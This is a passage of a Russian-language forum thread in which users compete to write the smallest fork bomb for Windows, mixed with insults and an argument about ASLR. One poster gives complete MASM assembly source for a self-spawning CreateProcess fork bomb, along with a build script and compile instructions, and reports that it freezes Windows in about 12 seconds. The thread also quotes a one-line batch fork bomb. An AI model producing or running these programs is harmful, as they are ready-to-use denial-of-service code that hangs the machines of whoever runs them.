Fork-бомба размером 45 байт

Майор Очевидность · 08-03-11 01:19:37

Svart Testare,
один голос есть.

дайте высказаться остальным.

под все Windows я этот геморрой повторять точно не стану… smile

Svart Testare · 08-03-11 01:19:45

Mazzy пишет:

Нормальный человек при создании батника может сделать следующее:нажмёт правой кнопкой мыши, создать файл, текстовый файл. А потом тупо переименует с расширением .bat

Ну так поступила бы малограмотная продавщица гастронома. А грамотный человек задаст имя при сохранении файла.

Mazzy · 08-03-11 01:26:29

Svart Testare пишет:

Ну так поступила бы малограмотная продавщица гастронома. А грамотный человек задаст имя при сохранении файла.

Глупый спор. Все останутся при своём мнении.

Майор Очевидность · 08-03-11 01:28:03

в связи с тем, что мой вопрос ушёл на предыдущую страницу, продублирую здесь:

так, по-моему я сумел разобраться с вызовом WinAPI посредством ассемблерной команды SYSENTER.
сейчас единственное, что удерживает меня от выкладывания кода минимального PE EXE-приложения (порядка 400 байт), выполняющего то же самое, что исходная программа для Linux — это различия ABI ядра Windows в зависимости от версии: www.metasploit.com/users/opcode/syscalls.html.
итак, под какую систему выкладывать код: XP, Vista или 7?

Mazzy · 08-03-11 01:28:43

Семёрочку в студию)

pavel2403 · 08-03-11 01:30:38

Майор Очевидность пишет:

так, по-моему я сумел разобраться с вызовом WinAPI посредством ассемблерной команды SYSENTER.
сейчас единственное, что удерживает меня от выкладывания кода минимального PE EXE-приложения (порядка 400 байт), выполняющего то же самое, что исходная программа для Linux — это различия ABI ядра Windows в зависимости от версии: www.metasploit.com/users/opcode/syscalls.html.
итак, под какую систему выкладывать код: XP, Vista или 7?

МН, тебе чо делать нехер??? Тебе же уже показали 23 байта, если тебе не нравиться формат CMD то конвертируй его в exe video-a.ru/programs/25912-bat-to-exe-co … -1500.htmlзачем такие извраты??? Линух-way????

Майор Очевидность · 08-03-11 01:31:58

pavel2403 пишет:

зачем такие извраты??? Линух-way????

Паш, открываем глазки и читаем:

Svart Testare пишет:
музыка вообще ни на секунду не прервалась во время работы бомбы
дело в том, что Ваше решение просто-напросто неэффективно, т.к. крайне мало отношение J суммарного объёма кода к эффективному (т.е. расходуемому непосредственно на создание копий).
изначальный пост, если помните, и был направлен на создание программы с максимально возможным J.
я даже специально приводил сравнение со средствами администрирования, где J ~ 1/90, тогда как в моей программе J = 2/3 (третья инструкция — безусловный переход).
Svart Testare пишет:
Моя бомба получилась всего 23 байта вместо ваших 45
сравнение не совсем корректно, т.к. у Вас шеллскрипт, а у меня нативный код.
если уж такая пьянка, то можно уложиться и в 5 байт:
%0|%0
но это не отменит того факта, что эффективность данного подхода весьма низка.

или тебе невдомёк разница между нативным машинным кодом и шелл-кодом? smile
если да, то, во-первых посчитай, во сколько команд обойдётся трансляция CMD в машинные команды, и, главное, каков будет размер транслированного решения, и сколько «обвязки» потребуется для того чтобы просто вызвать функцию копирования процесса.
также, добавь сюда затраты на обращение к системе для создания окна, его первичной отрисовки и тому подобного.

pavel2403 · 08-03-11 01:35:18

Майор Очевидность пишет:

сразу оговорюсь, SYSENTER используется просто для чистоты эксперимента, как наиболее близкий к исходному вариант вызова ядерной функции.
при вызове через API, мы потеряем такты на внутрисистемный перевод в тот же самый SYSENTER и непосредственный вызов.

Ты забыл добавить, что это надо запустить под root(Администратором) потому как ядерные функции не вызвать с правами юзера. Не???

Svart Testare · 08-03-11 01:36:44

Альо, товарищи! Ну будет для семёрки бомба сегодня или нет? Я уже спать хочу!

Майор Очевидность · 08-03-11 01:39:15

Svart Testare пишет:

Ну будет для семёрки бомба сегодня или нет?

вряд ли.
у меня здесь только ХР и Vista, а мне ещё её тестировать smile
прошу подождать до завтра.

pavel2403 пишет:

ядерные функции не вызвать с правами юзера. Не???

это смотря какие.

pavel2403 · 08-03-11 01:39:37

Майор Очевидность пишет:

или тебе невдомёк разница между нативным машинным кодом и шелл-кодом?

МН, ты тупой штоле??? Какая нах разница каким кодом вызывать??? Ну добавь к окнам CMD еще какой нибудь хрени и получиш свое J \в сторону: блять, упоротый, ниочем какой-то бред несет.

Майор Очевидность · 08-03-11 01:45:21

pavel2403 пишет:

Ну добавь к окнам CMD еще какой нибудь хрени и получиш свое J

ох-ма.

ты бы разобрался сначала, о чём вообще речь.
я стремлюсь к максимальному соотношению (ВНИМАНИЕ!) эффективного кода к суммарному.

эффективный код — это всего несколько PUSH, забивка пары регистров определёнными значениями и вызов SYSENTER.
суммарный код — это, помимо указанного, ещё и вся остальная обвязка, состоящая из обращений к API, создания окон, их прорисовки и всего остального, что ты там хочешь добавить, и что уже за тебя добавил транслятор, в силу неидеальности трансляции.

суммарного кода должен быть как можно МЕНЬШЕ, поскольку размер эффективного — константа (порядка 10-12 байт), и её ничем не изменишь.

ключевую фразу жирным выделять?

Добавлено спустя 06 мин 17 с:

pavel2403 пишет:

в сторону: блять, упоротый, ниочем какой-то бред несет.

невежда судит точно так: в чём толку не поймёт — то у него пустяк.
И. Крылов

Майор Очевидность · 08-03-11 07:51:56

в общем, что мы имеем.

за последние несколько часов, заставить работать PE-файл размером меньше минимального по стандарту (1024 байта) под Windows 7, мне не удалось.
скорее всего, это-таки возможно, но у меня продолжать исследования здесь и сейчас желания нет.
возможно, я ещё напишу по данной теме позднее.

в силу вышесказанного, отпадает необходимость в SYSENTER, а следовательно в вырезании из заголовка таблиц импорта и потере совместимости.
итак, вот он, код:

.386
.model flat, stdcall

includelib c:\masm32\lib\kernel32.lib
externdef _imp__CreateProcessA@40:PTR pr10

.code
@main:
  SUB ESP, 31*4;
  MOV EDI, ESP;
  XOR EAX, EAX;
  LEA ECX, [EAX+31];
  REP STOSD;

  LEA EDI, [ESP+31*4-16];
  MOV [ESP+36], EDI;
  LEA EDI, [ESP+40];
  MOV [ESP+32], EDI;
  MOV [ESP], OFFSET @name;

  @loop:
  CALL _imp__CreateProcessA@40;
  SUB ESP, 40;
  JMP @loop;

  @name DB "forkbomb.exe",0;

end @main;

создаём файл forkbomb.asm, переносим туда код, и компилируем с помощью нижеследующего батника:

del forkbomb.exe

C:\MASM32\BIN\Ml.exe /c /coff forkbomb.asm
C:\MASM32\BIN\PoLink.exe /SUBSYSTEM:WINDOWS /merge:.data=.text forkbomb.obj

del forkbomb.obj
pause

для компиляции потребуется пакет MASM32, который можно загрузить вот отсюда.

напоследок, несколько слов о кардинальных отличиях между Windows- и Linux-версиями.
код для Windows использует API-функцию CreateProcess, которая не копирует уже созданный процесс (что избавило бы ОС от необходимости повторно проводить инициализацию памяти, создание потока, его запуск и проч.), а создаёт новый.
это приводит к куда большему проценту системного времени в общем времени исполнения, а также предоставляет пользователю больше времени на администрирование, до того как ОС зависнет «наглухо»: 12 секунд против 1-й на Linux, на идентичном оборудовании.
что называется, достоинства есть продолжение недостатков smile

впрочем, справедливости ради, и там и там, при попытке убить первичный процесс бомбы (что автоматически прикончило бы всех потомков на Linux, равно как и на Windows, если было выбрано «Kill Process Tree»), на дальнейший пользовательский ввод ни та, ни другая системы не реагировали.

Mazzy · 08-03-11 10:29:10

Майор Очевидность, у меня под Вин7 ничего не происходило. Никаких окошек и т.д. Процессор нагружен на 60-70%, но вполне работает.

pavel2403 · 08-03-11 11:00:47

Майор Очевидность пишет:

за последние несколько часов, заставить работать PE-файл размером меньше минимального по стандарту (1024 байта) под Windows 7, мне не удалось.

Неасилил! big_smile

Добавлено спустя 09 мин 47 с:

Майор Очевидность пишет:

код для Windows использует API-функцию CreateProcess, которая не копирует уже созданный процесс (что избавило бы ОС от необходимости повторно проводить инициализацию памяти, создание потока, его запуск и проч.), а создаёт новый.
это приводит к куда большему проценту системного времени в общем времени исполнения, а также предоставляет пользователю больше времени на администрирование, до того как ОС зависнет «наглухо»: 12 секунд против 1-й на Linux, на идентичном оборудовании.
что называется, достоинства есть продолжение недостатков

ЁО-О. а недостаток ли это??? Судя по этомуru.wikipedia.org/wiki/ASLR так специально задумывалось.

Майор Очевидность · 08-03-11 15:13:29

pavel2403 пишет:

Судя по этомуhttp://ru.wikipedia.org/wiki/ASLR так специально задумывалось.

ээ…
вообще говоря, если бы ты умел внимательно читать, а во-вторых, не полагался бы на википедийных «переводчиков», то увидел бы, что ASLR включается только для бинарей, специально слинкованных под этот ASLR.

если ты мне покажешь, где в моём батнике ключи на линковку с ASLR, я тебе подарю шоколадную мидальку smile

pavel2403 пишет:

Неасилил!

Паш, кто бы говорил.
Ты стандарт PE вообще читал?

Mazzy пишет:

у меня под Вин7 ничего не происходило. Никаких окошек и т.д.

а так и задумывалось.
окошек и не должно быть.
просто, как я уже сказал, уходу в пожирающий процессорное время цикл препятствует сам вызов CreateProcess, искусственно создающий простои, и тем самым не дающий запущенным программам захавать все 100% процессорного времени, и как следствие, количество запусков в секунду сильно ограничивается.
иными словами, работе «чистой» FORK-бомбы препятствует сама Windows, в силу особенности своей архитектуры.
называть это достоинством или недостатком не возьмусь: всё зависит от того, как посмотреть.

pavel2403 · 08-03-11 19:39:59

Майор Очевидность пишет:

вообще говоря, если бы ты умел внимательно читать, а во-вторых, не полагался бы на википедийных «переводчиков», то увидел бы, что ASLR включается только для бинарей, специально слинкованных под этот ASLR.

Пруф??? Хотя я и без пруфа вижу что ты несешь абсолютный бред. ASLR-это внутренняя фишка винды, от бинаря никак независимая, ты видимо читал пруф, что я тебе дал, но нихуя не понял как обычно. Ты что в бинаре прописываешь адрес стека или кучи??? Ты можешь указать только начальное смещения в стеке, а все остальное делает система.
Специально для линух-Икпердов, пытающихся осилить Assembler/ ASLR препятсвует таким видам распространенной атаки на приложение как переполнение буфера приводящее к выполнению произвольного кода злоумышленника, то есть если в бинарник что-то дописать и вызвать переполнение буфера, подсунув некоректные данные программе, то получить адрес возврата на начало вредоносного кода попросу невозможно, приложение вывалиться с ошибкой. К слову, такой вид атаки и соотвествющие уязвимости в линухе сплош и рядом, а это так трудно признавать, ведь линух святой да, а винда плохая. big_smile
Добавлено спустя 05 мин 43 с:

Майор Очевидность пишет:

а так и задумывалось.
окошек и не должно быть.
просто, как я уже сказал, уходу в пожирающий процессорное время цикл препятствует сам вызов CreateProcess, искусственно создающий простои, и тем самым не дающий запущенным программам захавать все 100% процессорного времени, и как следствие, количество запусков в секунду сильно ограничивается.
иными словами, работе «чистой» FORK-бомбы препятствует сама Windows, в силу особенности своей архитектуры.
называть это достоинством или недостатком не возьмусь: всё зависит от того, как посмотреть.

Конечно, если винда имеет защиты от таких хитрожопых типа тебя, то это конечно же недостаток ибо не укладывается в мировоззрение лунохода- винда дырявая. big_smile

Отредактировано pavel2403 (08-03-11 19:53:57)

ikkunan salvataja · 08-03-11 20:11:45

pavel2403 пишет:

Специально для линух-Икпердов, пытающихся осилить Assembler

Етить твою. Пашик, а ты уже осилил? А то я помню твоё дизассемблирование.

pavel2403 · 08-03-11 20:17:50

ikkunan salvataja пишет:

Етить твою. Пашик, а ты уже осилил? А то я помню твоё дизассемблирование.

О Акуна, привет!!! Я тебя ждал. Ну ка выскажи свое авторитетное мнение по этому вопросу, а то я как бы не совсем уверен, все таки грамотежки по данному вопросу у меня маловато. Я уже думал, когда же ты придешь!!! Только чур, говорить как спец, а не луноход.

Отредактировано pavel2403 (08-03-11 20:20:13)

ikkunan salvataja · 08-03-11 20:36:20

pavel2403 пишет:

а то я как бы не совсем уверен,

Ну тогда просвещайся, хотя бы здесь:
sonikelf.info/populyarnye-programmy-pod … ep-i-aslr/
Первым артиклем.
Т.е. ASLR это механизм, позволяющий приложению защититься от специальным образом подсунутых данных.

Майор Очевидность · 08-03-11 20:52:09

pavel2403 пишет:

Специально для линух-Икпердов, пытающихся осилить Assembler

я-то его уже давным-давно «осилил».
а вот тебе, видимо, до этого далеко.

pavel2403 пишет:

Ты что в бинаре прописываешь адрес стека или кучи??? Ты можешь указать только начальное смещения в стеке, а все остальное делает система.

а, вот оно что.
пациент не понимает, чем компиляция отличается от линковки.
итак, краткий ликбез:
если мы линкуем программу без ASLR, то все адреса вызовов, а также базовые адреса кодовой секции, стэка и кучи записываются в бинарь статически.
в том, что предоставил я, это именно так и происходит.
я, кстати, таки и не понял, к чему ты этот ASLR вообще сюда приплёл.
или ты даже принципа FORK-атаки (а также отличий от атак переполнения) не понимаешь?

pavel2403 пишет:

Конечно, если винда имеет защиты от таких хитрожопых типа тебя, то это конечно же недостаток ибо не укладывается в мировоззрение лунохода- винда дырявая.

Паш, хватит уже перед всеми позориться.
это не метод защиты, это специфика архитектуры.
но ты, видимо, по традиции не понял ни слова из того, что я сказал.

EvgenijM86 · 08-03-11 22:04:58

www.youtube.com/watch?v=5DmF9JgJAPQ big_smile

pavel2403 · 08-03-11 22:19:27

Майор Очевидность пишет:

а, вот оно что.
пациент не понимает, чем компиляция отличается от линковки.
итак, краткий ликбез:
если мы линкуем программу без ASLR, то все адреса вызовов, а также базовые адреса кодовой секции, стэка и кучи записываются в бинарь статически.
в том, что предоставил я, это именно так и происходит.

Понятно, убедил.

Майор Очевидность пишет:

я, кстати, таки и не понял, к чему ты этот ASLR вообще сюда приплёл.
или ты даже принципа FORK-атаки (а также отличий от атак переполнения) не понимаешь?

Да нет, понимаю, только в том что ты писал

Майор Очевидность пишет:

уходу в пожирающий процессорное время цикл препятствует сам вызов CreateProcess, искусственно создающий простои

это думал как бы оно так задумывалось.

Майор Очевидность пишет:

Паш, хватит уже перед всеми позориться.
это не метод защиты, это специфика архитектуры.

Я??? Позориться??? Это м..м наверное я пообещал сделать форк-бомбу для винды и обосрался??? Ты ничего не перепутал, луноход??? big_smile

Майор Очевидность · 08-03-11 22:24:33

pavel2403 пишет:

Это м..м наверное я пообещал сделать форк-бомбу для винды и обосрался???

а, т.е. ты даже не компилировал и не запускал.
ну то ж, дело твоё.
а между тем, код работает и в конечном счёте вполне себе успешно подвешивает Винду.
единственное, в чём заключается разница с Linux-версией — в эффективности.
если тебе так будет спокойнее — разница во времени на моей машине (Core 2 Duo T5500/1.66GHz, 1GB) — 12 секунд до зависания Windows против 1 у Linux.
именно объяснением различий в эффективности я здесь и занимался последние несколько сообщений.
но чукча же у нас не читатель, да.

pavel2403 пишет:

Ты ничего не перепутал, луноход???

нет, марсолёт, я ничего не перепутал smile

pavel2403 · 09-03-11 07:56:34

Майор Очевидность пишет:

а, т.е. ты даже не компилировал и не запускал.
ну то ж, дело твоё.

Конечно, ведь в отличие от тебя мне есть чем заняться в свободное время, вместо того, что бы производить манипуляции подпадающие под действие ст 273 УК РФ www.ukru.ru/code/09/273/index.htm. К тому же я как бы верю людям

Mazzy пишет:

Майор Очевидность, у меня под Вин7 ничего не происходило. Никаких окошек и т.д. Процессор нагружен на 60-70%, но вполне работает.

big_smile

Отредактировано pavel2403 (09-03-11 07:57:41)

Форум StopLinux

Объявление

#51 08-03-11 01:19:37

Re: Fork-бомба размером 45 байт

#52 08-03-11 01:19:45

Re: Fork-бомба размером 45 байт

#53 08-03-11 01:26:29

Re: Fork-бомба размером 45 байт

#54 08-03-11 01:28:03

Re: Fork-бомба размером 45 байт

#55 08-03-11 01:28:43

Re: Fork-бомба размером 45 байт

#56 08-03-11 01:30:38

Re: Fork-бомба размером 45 байт

#57 08-03-11 01:31:58

Re: Fork-бомба размером 45 байт

#58 08-03-11 01:35:18

Re: Fork-бомба размером 45 байт

#59 08-03-11 01:36:44

Re: Fork-бомба размером 45 байт

#60 08-03-11 01:39:15

Re: Fork-бомба размером 45 байт

#61 08-03-11 01:39:37

Re: Fork-бомба размером 45 байт

#62 08-03-11 01:45:21

Re: Fork-бомба размером 45 байт

#63 08-03-11 07:51:56

Re: Fork-бомба размером 45 байт

#64 08-03-11 10:29:10

Re: Fork-бомба размером 45 байт

#65 08-03-11 11:00:47

Re: Fork-бомба размером 45 байт

#66 08-03-11 15:13:29

Re: Fork-бомба размером 45 байт

#67 08-03-11 19:39:59

Re: Fork-бомба размером 45 байт

#68 08-03-11 20:11:45

Re: Fork-бомба размером 45 байт

#69 08-03-11 20:17:50

Re: Fork-бомба размером 45 байт

#70 08-03-11 20:36:20

Re: Fork-бомба размером 45 байт

#71 08-03-11 20:52:09

Re: Fork-бомба размером 45 байт

#72 08-03-11 22:04:58

Re: Fork-бомба размером 45 байт

#73 08-03-11 22:19:27

Re: Fork-бомба размером 45 байт

#74 08-03-11 22:24:33

Re: Fork-бомба размером 45 байт

#75 09-03-11 07:56:34

Re: Fork-бомба размером 45 байт

Подвал форума